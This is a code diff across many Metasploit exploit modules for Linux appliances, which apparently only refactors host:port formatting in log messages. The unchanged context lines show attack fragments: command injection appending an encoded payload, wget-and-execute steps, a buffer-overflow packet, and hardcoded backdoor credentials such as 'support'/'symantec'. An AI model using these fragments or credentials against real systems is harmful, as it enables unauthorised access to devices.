+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Telnet session successfully established...")
     end
 
     handler(sock)

--- a/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb
+++ b/modules/exploits/linux/http/sophos_wpa_sblistpack_exec.rb
@@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("#{rhost}:#{rport} - Executing payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Executing payload...")
     url = "http://www.#{rand_text_alpha(10 + rand(10))}.com"
     domain = "http://#{rand_text_alpha(10 + rand(10))}.com;#{payload.encoded}"
     # very short timeout because the request may never return if we're

--- a/modules/exploits/linux/http/spark_unauth_rce.rb
+++ b/modules/exploits/linux/http/spark_unauth_rce.rb
@@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # Handle incoming requests
   def on_request_uri(cli, request)
-    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending the payload to the server...")
     send_response(cli, @pl)
   end
 end

--- a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     if check == Exploit::CheckCode::Safe
-      print_status("#{rhost}:#{rport} doesn't look like Symantec Web Gateway, will not engage.")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} doesn't look like Symantec Web Gateway, will not engage.")
       return
     end
 

--- a/modules/exploits/linux/http/symmetricom_syncserver_rce.rb
+++ b/modules/exploits/linux/http/symmetricom_syncserver_rce.rb
@@ -129,14 +129,14 @@ class MetasploitModule < Msf::Exploit
         'Path' => resource_uri
       }
     })
-    print_status("#{rhost}:#{rport} - Exploit started...")
-    print_status("#{rhost}:#{rport} - Sending wget command...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Exploit started...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending wget command...")
     request(cmds[0])
     sleep(3)
-    print_status("#{rhost}:#{rport} - Making payload executable...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Making payload executable...")
     request(cmds[1])
     sleep(3)
-    print_status("#{rhost}:#{rport} - Executing payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Executing payload...")
     request(cmds[2])
     sleep(3)
   end

--- a/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
+++ b/modules/exploits/linux/http/tp_link_ncxxx_bonjour_command_injection.rb
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     return res
   rescue ::Rex::ConnectionError
-    vprint_error("Failed connection to the web server at #{rhost}:#{rport}")
+    vprint_error("Failed connection to the web server at #{Rex::Socket.to_authority(rhost, rport)}")
     return nil
   end
 
@@ -137,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     return res
   rescue ::Rex::ConnectionError
-    vprint_error("Failed connection to the web server at #{rhost}:#{rport}")
+    vprint_error("Failed connection to the web server at #{Rex::Socket.to_authority(rhost, rport)}")
     return nil
   end
 

--- a/modules/exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection.rb
+++ b/modules/exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection.rb
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Safe('Target is not a WD MyCloud application.') unless res.code == 200 && res.body.include?('var MODEL_ID = "WDMyCloud')
 
-    print_status("#{rhost}:#{rport} - The target is WD MyCloud. Checking vulnerability status...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - The target is WD MyCloud. Checking vulnerability status...")
     # try the authentication bypass (CVE-2018-17153)
     res = send_request_cgi({
       'method' => 'GET',
@@ -126,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # send a command to print a random string via echo. if the target is vulnerable, both the command  and the command output will be part of the response body
     echo_cmd = "echo #{Rex::Text.rand_text_alphanumeric(8..42)}"
-    print_status("#{rhost}:#{rport} - Attempting to execute #{echo_cmd}...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempting to execute #{echo_cmd}...")
     res = execute_command(echo_cmd, { 'wait_for_response' => true })
 
     return CheckCode::Unknown('Connection failed while trying to execute the echo command to check the vulnerability status.') unless res
@@ -156,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     if target.arch.first == ARCH_CMD
-      print_status("#{rhost}:#{rport} - Executing the payload. This may take a few seconds...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Executing the payload. This may take a few seconds...")
       execute_command(payload.encoded)
     else
       execute_cmdstager(background: true)

--- a/modules/exploits/linux/misc/hid_discoveryd_command_blink_on_unauth_rce.rb
+++ b/modules/exploits/linux/misc/hid_discoveryd_command_blink_on_unauth_rce.rb
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     @mac = hid_res[:mac]
 
-    vprint_good "#{rhost}:#{rport} - HID discoveryd service detected"
+    vprint_good "#{Rex::Socket.to_authority(rhost, rport)} - HID discoveryd service detected"
     vprint_line hid_res.to_s
     report_service(
       host: rhost,
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     if hid_res[:version].to_s.eql? ''
-      vprint_error "#{rhost}:#{rport} - Could not determine device version"
+      vprint_error "#{Rex::Socket.to_authority(rhost, rport)} - Could not determine device version"
       return CheckCode::Detected
     end
 
@@ -119,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'V2000'    # VertX Legacy
       vuln = true if version <= Rex::Version.new('2.2.7.568')
     else
-      vprint_error "#{rhost}:#{rport} - Device model was not recognized"
+      vprint_error "#{Rex::Socket.to_authority(rhost, rport)} - Device model was not recognized"
       return CheckCode::Detected
     end
 
@@ -167,7 +167,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status "#{rhost}:#{rport} - Connecting to target"
+    print_status "#{Rex::Socket.to_authority(rhost, rport)} - Connecting to target"
 
     check_code = check
     unless check_code == CheckCode::Appears || check_code == CheckCode::Detected

--- a/modules/exploits/linux/misc/hp_vsa_login_bof.rb
+++ b/modules/exploits/linux/misc/hp_vsa_login_bof.rb
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     connect
     packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{target['Version']}\"")
-    vprint_status("#{rhost}:#{rport} Sending login packet to check...")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Sending login packet to check...")
     sock.put(packet)
     res = sock.get_once
     disconnect
@@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     connect
-    print_status("#{rhost}:#{rport} Sending login packet")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} Sending login packet")
     my_bof = rand_text(target['Offset'])
     my_bof << [target.ret].pack("V")
     my_bof << [target['FakeObject']].pack("V") # Pointer to Fake Object in order to survive LHNSessionManager::SendMessage before ret

--- a/modules/exploits/linux/postgres/postgres_payload.rb
+++ b/modules/exploits/linux/postgres/postgres_payload.rb
@@ -126,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Returns the version from #postgres_fingerprint
   def do_login(user = nil, pass = nil, database = nil)
     password = pass || postgres_password
-    vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}") unless postgres_conn
+    vprint_status("Trying #{user}:#{password}@#{Rex::Socket.to_authority(rhost, rport)}/#{database}") unless postgres_conn
     result = postgres_fingerprint(
       db: database,
       username: user,

--- a/modules/exploits/linux/smtp/barracuda_esg_tarfile_rce.rb
+++ b/modules/exploits/linux/smtp/barracuda_esg_tarfile_rce.rb
@@ -114,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Composing email with TAR attachment')
     email_data = generate_exploit_email(tar_data)
 
-    print_status("Sending exploit email to #{datastore['MAILTO']} via #{rhost}:#{rport}")
+    print_status("Sending exploit email to #{datastore['MAILTO']} via #{Rex::Socket.to_authority(rhost, rport)}")
     send_message(email_data)
 
     print_good('Email sent successfully')

--- a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
+++ b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # wait for the data to be sent
   def wait_linux_payload
-    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Waiting for the victim to request the ELF payload...")
 
     waited = 0
     while (not @elf_sent)
@@ -90,10 +90,10 @@ class MetasploitModule < Msf::Exploit::Remote
   # Handle incoming requests from the server
   def on_request_uri(cli, request)
     if (not @pl)
-      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - A request came in, but the payload wasn't ready yet!")
       return
     end
-    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending the payload to the server...")
     @elf_sent = true
     send_response(cli, @pl)
   end
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       service_url = 'http://' + srvhost_addr + ':' + datastore['SRVPORT'].to_s + resource_uri
       service_url_payload = srvhost_addr + resource_uri
-      print_status("#{rhost}:#{rport} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/#{resource_uri}...")
       start_service({
         'Uri' => {
           'Proc' => Proc.new { |cli, req|
@@ -133,7 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     connect
 
-    print_status("#{rhost}:#{rport} - Server: #{self.banner.to_s.strip}")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Server: #{self.banner.to_s.strip}")
     if not datastore['SkipVersionCheck'] and self.banner.to_s !~ /Exim /
       disconnect
       fail_with(Failure::NoTarget, "#{rhost}:#{rport} - The target server is not running Exim!")
@@ -142,7 +142,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ehlo = datastore['EHLO']
     ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
     ehlo_resp.each_line do |line|
-      print_status("#{rhost}:#{rport} - EHLO: #{line.strip}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - EHLO: #{line.strip}")
     end
 
     #
@@ -162,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if not resp or resp[0, 3] != '250'
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
     else
-      print_status("#{rhost}:#{rport} - #{msg}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - #{msg}")
     end
 
     resp = raw_send_recv("RCPT TO: #{to}\r\n")
@@ -171,7 +171,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if not resp or resp[0, 3] != '250'
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
     else
-      print_status("#{rhost}:#{rport} - #{msg}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - #{msg}")
     end
 
     resp = raw_send_recv("DATA\r\n")
@@ -180,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if not resp or resp[0, 3] != '354'
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
     else
-      print_status("#{rhost}:#{rport} - #{msg}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - #{msg}")
     end
 
     message = "Subject: test\r\n"
@@ -192,13 +192,13 @@ class MetasploitModule < Msf::Exploit::Remote
     if not resp or resp[0, 3] != '250'
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{msg}")
     else
-      print_status("#{rhost}:#{rport} - #{msg}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - #{msg}")
     end
     disconnect
 
     # wait for payload download
     if (datastore['DOWNHOST'])
-      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the target to download the payload")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Giving #{datastore['HTTP_DELAY']} seconds to the target to download the payload")
       select(nil, nil, nil, datastore['HTTP_DELAY'])
     else
       wait_linux_payload

--- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
+++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
@@ -96,16 +96,16 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::ConnectionError
       return nil
     rescue Net::SSH::Disconnect, ::EOFError
-      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Disconnected during negotiation"
       return nil
     rescue ::Timeout::Error
-      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
       return nil
     rescue Net::SSH::AuthenticationFailed
-      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Failed authentication"
       return nil
     rescue Net::SSH::Exception => e
-      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH Error: #{e.class} : #{e.message}"
       return nil
     end
 
@@ -124,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     conn = do_login('mateidu')
     if conn
-      print_good "#{rhost}:#{rport} - Successful login"
+      print_good "#{Rex::Socket.to_authority(rhost, rport)} - Successful login"
       handler(conn.lsock)
     end
   end

--- a/modules/exploits/linux/ssh/cisco_ucs_scpuser.rb
+++ b/modules/exploits/linux/ssh/cisco_ucs_scpuser.rb
@@ -101,15 +101,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::ConnectionError
       return
     rescue Net::SSH::Disconnect, ::EOFError
-      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Disconnected during negotiation"
       return
     rescue ::Timeout::Error
-      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
       return
     rescue Net::SSH::AuthenticationFailed
-      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Failed authentication"
     rescue Net::SSH::Exception => e
-      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH Error: #{e.class} : #{e.message}"
       return
     end
 
@@ -126,10 +126,10 @@ class MetasploitModule < Msf::Exploit::Remote
     user = datastore['USERNAME']
     pass = datastore['PASSWORD']
 
-    print_status("#{rhost}:#{rport} - Attempt to login to the Cisco appliance...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempt to login to the Cisco appliance...")
     conn = do_login(user, pass)
     if conn
-      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Login Successful (#{user}:#{pass})")
       handler(conn.lsock)
     end
   end

--- a/modules/exploits/linux/ssh/exagrid_known_privkey.rb
+++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb
@@ -89,15 +89,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::ConnectionError
       return
     rescue Net::SSH::Disconnect, ::EOFError
-      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Disconnected during negotiation"
       return
     rescue ::Timeout::Error
-      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
       return
     rescue Net::SSH::AuthenticationFailed
-      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Failed authentication"
     rescue Net::SSH::Exception => e
-      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH Error: #{e.class} : #{e.message}"
       return
     end
 

--- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb
+++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb
@@ -96,15 +96,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::ConnectionError
       return
     rescue Net::SSH::Disconnect, ::EOFError
-      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Disconnected during negotiation"
       return
     rescue ::Timeout::Error
-      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
       return
     rescue Net::SSH::AuthenticationFailed
-      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Failed authentication"
     rescue Net::SSH::Exception => e
-      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH Error: #{e.class} : #{e.message}"
       return
     end
 

--- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb
+++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb
@@ -93,16 +93,16 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::ConnectionError
       return nil
     rescue Net::SSH::Disconnect, ::EOFError
-      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Disconnected during negotiation"
       return nil
     rescue ::Timeout::Error
-      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
       return nil
     rescue Net::SSH::AuthenticationFailed
-      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Failed authentication"
       return nil
     rescue Net::SSH::Exception => e
-      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH Error: #{e.class} : #{e.message}"
       return nil
     end
 
@@ -121,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     conn = do_login('root')
     if conn
-      print_good "#{rhost}:#{rport} - Successful login"
+      print_good "#{Rex::Socket.to_authority(rhost, rport)} - Successful login"
       handler(conn.lsock)
     end
   end

--- a/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
+++ b/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 
-    print_status("#{rhost}:#{rport} - Attempting to login...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempting to login...")
 
     begin
       ssh = nil
@@ -96,15 +96,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::ConnectionError
       return
     rescue Net::SSH::Disconnect, ::EOFError
-      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Disconnected during negotiation"
       return
     rescue ::Timeout::Error
-      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
       return
     rescue Net::SSH::AuthenticationFailed
-      print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Failed authentication due wrong credentials."
     rescue Net::SSH::Exception => e
-      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH Error: #{e.class} : #{e.message}"
       return
     end
     # rubocop:disable Lint/ShadowingOuterLocalVariable

--- a/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb
+++ b/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb
@@ -100,15 +100,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::ConnectionError
       return
     rescue Net::SSH::Disconnect, ::EOFError
-      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Disconnected during negotiation"
       return
     rescue ::Timeout::Error
-      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
       return
     rescue Net::SSH::AuthenticationFailed
-      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Failed authentication"
     rescue Net::SSH::Exception => e
-      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH Error: #{e.class} : #{e.message}"
       return
     end
 
@@ -125,10 +125,10 @@ class MetasploitModule < Msf::Exploit::Remote
     user = datastore['USERNAME']
     pass = datastore['PASSWORD']
 
-    print_status("#{rhost}:#{rport} - Attempt to login to the server...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempt to login to the server...")
     conn = do_login(user, pass)
     if conn
-      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Login Successful (#{user}:#{pass})")
       handler(conn.lsock)
     end
   end

--- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb
+++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb
@@ -92,16 +92,16 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::ConnectionError
       return nil
     rescue Net::SSH::Disconnect, ::EOFError
-      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Disconnected during negotiation"
       return nil
     rescue ::Timeout::Error
-      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
       return nil
     rescue Net::SSH::AuthenticationFailed
-      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Failed authentication"
       return nil
     rescue Net::SSH::Exception => e
-      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH Error: #{e.class} : #{e.message}"
       return nil
     end
 
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     conn = do_login('root')
     if conn
-      print_good "#{rhost}:#{rport} - Successful login"
+      print_good "#{Rex::Socket.to_authority(rhost, rport)} - Successful login"
       handler(conn.lsock)
     end
   end

--- a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb
+++ b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb
@@ -96,16 +96,16 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::ConnectionError
       return nil
     rescue Net::SSH::Disconnect, ::EOFError
-      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Disconnected during negotiation"
       return nil
     rescue ::Timeout::Error
-      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
       return nil
     rescue Net::SSH::AuthenticationFailed
-      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Failed authentication"
       return nil
     rescue Net::SSH::Exception => e
-      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH Error: #{e.class} : #{e.message}"
       return nil
     end
 
@@ -121,10 +121,10 @@ class MetasploitModule < Msf::Exploit::Remote
     user = datastore['USER']
     pass = datastore['PASS']
 
-    print_status("#{rhost}:#{rport} - Attempt to login...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempt to login...")
     conn = do_login(user, pass)
     if conn
-      print_good("#{rhost}:#{rport} - Login Successful ('#{user}:#{pass})")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Login Successful ('#{user}:#{pass})")
       handler(conn.lsock)
     end
   end

--- a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb
+++ b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb
@@ -124,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempt to login...")
     conn = do_login(user, pass)
     if conn
-      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Login Successful ('#{user}:#{pass})")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Login Successful (#{user}:#{pass})")
       handler(conn.lsock)
     end
   end

--- a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb
+++ b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
 
-    print_status("#{rhost}:#{rport} - Attempting to login...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempting to login...")
 
     begin
       ssh = nil
@@ -97,15 +97,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::ConnectionError
       return
     rescue Net::SSH::Disconnect, ::EOFError
-      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Disconnected during negotiation"
       return
     rescue ::Timeout::Error
-      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
       return
     rescue Net::SSH::AuthenticationFailed
-      print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Failed authentication due wrong credentials."
     rescue Net::SSH::Exception => e
-      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH Error: #{e.class} : #{e.message}"
       return
     end
 

--- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb
+++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb
@@ -88,15 +88,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::ConnectionError
       return
     rescue Net::SSH::Disconnect, ::EOFError
-      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Disconnected during negotiation"
       return
     rescue ::Timeout::Error
-      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
       return
     rescue Net::SSH::AuthenticationFailed
-      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Failed authentication"
     rescue Net::SSH::Exception => e
-      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH Error: #{e.class} : #{e.message}"
       return
     end
 
@@ -113,10 +113,10 @@ class MetasploitModule < Msf::Exploit::Remote
     user = 'support'
     pass = 'symantec'
 
-    print_status("#{rhost}:#{rport} - Attempt to login...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Attempt to login...")
     conn = do_login(user, pass)
     if conn
-      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Login Successful (#{user}:#{pass})")
       handler(conn.lsock)
     end
   end

--- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
+++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
@@ -90,15 +90,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue Rex::ConnectionError
       return
     rescue Net::SSH::Disconnect, ::EOFError
-      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Disconnected during negotiation"
       return
     rescue ::Timeout::Error
-      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Timed out during negotiation"
       return
     rescue Net::SSH::AuthenticationFailed
-      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH - Failed authentication"
     rescue Net::SSH::Exception => e
-      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      print_error "#{Rex::Socket.to_authority(rhost, rport)} SSH Error: #{e.class} : #{e.message}"
       return
     end
 

--- a/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb
+++ b/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb
@@ -124,19 +124,19 @@ class MetasploitModule < Msf::Exploit::Remote
         ssh_socket = Net::SSH.start(rhost, user, opt_hash)
       end
     rescue Rex::ConnectionError
-      print_error "#{rhost}:#{rport} SSH - Unable to connect"
